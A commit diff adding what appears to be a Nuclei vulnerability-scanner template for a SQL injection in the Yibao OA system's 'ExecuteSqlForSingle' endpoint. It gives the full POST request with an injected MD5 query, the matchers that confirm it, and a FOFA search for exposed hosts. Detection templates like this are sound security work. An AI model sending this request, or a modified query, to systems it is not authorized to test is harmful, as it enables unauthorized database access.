Create yibao-sqli.yaml

http/vulnerabilities/other/yibao-sqli.yaml

@@ -0,0 +1,34 @@
+id: yibao-sqli
+
+info:
+  name: Yibao OA System 'ExecuteSqlForSingle' - SQL Injection
+  author: DhiyaneshDK
+  severity: high
+  metadata:
+    verified: true
+    max-request: 1
+    fofa-query: product="顶讯科技-易宝OA系统"
+  tags: yiboo,sqli
+
+variables:
+  num: "999999999"
+
+http:
+  - method: POST
+    path:
+      - "{{BaseURL}}/api/system/ExecuteSqlForSingle"
+    headers:
+      Content-Type: application/x-www-form-urlencoded
+    body: "token=zxh&sql=select substring(sys.fn_sqlvarbasetostr(HashBytes('MD5','{{num}}')),3,32)&strParameters"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - '{{md5({{num}})}}'
+
+      - type: word
+        part: header
+        words:
+          - 'application/json'